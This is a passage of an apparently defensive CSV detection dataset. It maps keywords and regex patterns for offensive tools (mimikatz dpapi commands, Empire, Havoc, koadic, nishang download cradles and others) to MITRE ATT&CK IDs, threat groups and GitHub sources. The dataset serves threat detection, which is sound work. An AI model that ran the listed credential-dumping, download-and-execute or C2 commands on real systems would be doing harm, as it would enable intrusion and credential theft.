tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*donut-shellcode*",".{0,1000}donut\-shellcode.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*dos-over-tor*",".{0,1000}dos\-over\-tor.{0,1000}","offensive_tool_keyword","dos-over-tor","Proof of concept denial of service over TOR stress test tool. Is multi-threaded and supports multiple attack vectors.","T1583 - T1090","TA0040 - TA0043","N/A","N/A","DDOS","https://github.com/skizap/dos-over-tor","1","0","N/A","N/A","1","26","11","2018-07-21T01:44:41Z","2018-07-26T07:05:37Z" "*dothatlsassthing*",".{0,1000}dothatlsassthing.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","5","468","55","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" "*dotnet ./Server.dll*",".{0,1000}dotnet\s\.\/Server\.dll.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*dotnet inline-execute *",".{0,1000}dotnet\sinline\-execute\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*dotnet Inveigh.dll*",".{0,1000}dotnet\sInveigh\.dll.{0,1000}","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2378","428","2024-02-22T14:09:40Z","2015-04-02T18:04:41Z" "*dotnet ParseMalleable/ParseMalleable.dll*",".{0,1000}dotnet\sParseMalleable\/ParseMalleable\.dll.{0,1000}","offensive_tool_keyword","AzureC2Relay","AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.","T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001","TA0042 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/Flangvik/AzureC2Relay","1","0","N/A","10","10","204","46","2021-02-15T18:06:38Z","2021-02-14T00:03:52Z" "*dotnet_serve_payload*",".{0,1000}dotnet_serve_payload.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*DotNet2JSImplant*",".{0,1000}DotNet2JSImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*DotNetArtifactGenerator.py*",".{0,1000}DotNetArtifactGenerator\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","10","10","1490","261","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z" "*DoubleAgent.sln*",".{0,1000}DoubleAgent\.sln.{0,1000}","offensive_tool_keyword","DoubleAgent","DoubleAgent gives the attacker the ability to inject any DLL into any process. The code injection occurs extremely early during the victims process boot. giving the attacker full control over the process and no way for the process to protect itself. The code injection technique is so unique that its not detected or blocked by any antivirus.DoubleAgent can continue injecting code even after reboot making it a perfect persistence technique to survive reboots/updates/reinstalls/patches/etc. Once the attacker decides to inject a DLL into a process. they are forcefully bounded forever. Even if the victim would completely uninstall and reinstall its program. the attackers DLL would still be injected every time the process executes.","T1055 - T1059 - T1053","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/Cybellum/DoubleAgent","1","1","N/A","N/A","10","1211","417","2022-08-24T10:32:36Z","2017-03-12T17:05:57Z" "*DoUCMe-main\*",".{0,1000}DoUCMe\-main\\.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","9","1","70","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z" "*douknowwhoami?d*",".{0,1000}douknowwhoami\?d.{0,1000}","offensive_tool_keyword","cobaltstrike","Implement load Cobalt Strike & Metasploit&Sliver shellcode with golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/zha0gongz1/DesertFox","1","0","N/A","10","10","124","27","2023-02-02T07:02:12Z","2021-02-04T09:04:13Z" "*download *bloodhound*",".{0,1000}download\s.{0,1000}bloodhound.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*download *Roaming\mRemoteNG\confCons.xml*",".{0,1000}download\s.{0,1000}Roaming\\mRemoteNG\\confCons\.xml.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021 - T1028 - T1046 - T1078 - T1091 - T1219","TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/Hackplayers/evil-winrm","1","0","N/A","10","10","4167","582","2024-04-29T07:48:05Z","2019-05-28T10:53:00Z" "*download /etc/passwd*",".{0,1000}download\s\/etc\/passwd.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*download.weakpass.com/*",".{0,1000}download\.weakpass\.com\/.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*Download:Cradle.js*",".{0,1000}Download\:Cradle\.js.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","249","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z" "*Download_Cradles.*",".{0,1000}Download_Cradles\..{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","249","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z" "*Download_Execute*",".{0,1000}Download_Execute.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*DownloadAndExtractFromRemoteRegistry*",".{0,1000}DownloadAndExtractFromRemoteRegistry.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*DownloadAndExtractFromRemoteRegistry*",".{0,1000}DownloadAndExtractFromRemoteRegistry.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Download-Cradles.cmd*",".{0,1000}Download\-Cradles\.cmd.{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","This are different types of download cradles which should be an inspiration to play and create new download cradles to bypass AV/EPP/EDR in context of download cradle detections.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","1","N/A","N/A","3","249","54","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z" "*downloadexec_UACbypass.lua*",".{0,1000}downloadexec_UACbypass\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*Download-Execute-PS*",".{0,1000}Download\-Execute\-PS.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*DownloadFileImplant*",".{0,1000}DownloadFileImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Downloading */*.tar to /tmp/*.pak*",".{0,1000}Downloading\s.{0,1000}\/.{0,1000}\.tar\sto\s\/tmp\/.{0,1000}\.pak.{0,1000}","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","0","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","150","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "*Downloading original SCNotification.exe.config via SMB*",".{0,1000}Downloading\soriginal\sSCNotification\.exe\.config\svia\sSMB.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "*downloadMalwareDomains*",".{0,1000}downloadMalwareDomains.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1466","285","2023-11-23T05:38:05Z","2017-03-01T11:16:26Z" "*downloads/wapiti-code*",".{0,1000}downloads\/wapiti\-code.{0,1000}","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","0","N/A","N/A","10","979","159","2024-05-01T19:11:32Z","2020-06-06T20:17:55Z" "*downloadshellcodebin.c*",".{0,1000}downloadshellcodebin\.c.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*downloadshellcodebin.exe*",".{0,1000}downloadshellcodebin\.exe.{0,1000}","offensive_tool_keyword","DKMC","Malicious payload evasion tool","T1027 - T1055.012","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/DKMC","1","1","N/A","10","10","1352","290","2020-07-20T03:36:56Z","2016-12-05T03:44:07Z" "*DownloadString*https://checkip.amazonaws.com*",".{0,1000}DownloadString.{0,1000}https\:\/\/checkip\.amazonaws\.com.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","460","71","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z" "*-dP -eP -rS -cF -pS -tO -gW --httpx --dnsprobe -aI webanalyze -sS*",".{0,1000}\-dP\s\-eP\s\-rS\s\-cF\s\-pS\s\-tO\s\-gW\s\-\-httpx\s\-\-dnsprobe\s\s\-aI\swebanalyze\s\-sS.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","0","N/A","N/A","10","1853","366","2024-02-19T14:38:48Z","2019-07-26T10:26:34Z" "*dpapi.py*",".{0,1000}dpapi\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*dpapi/decryptor.py*",".{0,1000}dpapi\/decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*dpapi::blob*",".{0,1000}dpapi\:\:blob.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::cache*",".{0,1000}dpapi\:\:cache.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::capi*",".{0,1000}dpapi\:\:capi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::chrome*",".{0,1000}dpapi\:\:chrome.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::cloudapkd*",".{0,1000}dpapi\:\:cloudapkd.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::cloudapreg*",".{0,1000}dpapi\:\:cloudapreg.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::cng*",".{0,1000}dpapi\:\:cng.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::create*",".{0,1000}dpapi\:\:create.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*dpapi::cred*",".{0,1000}dpapi\:\:cred.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 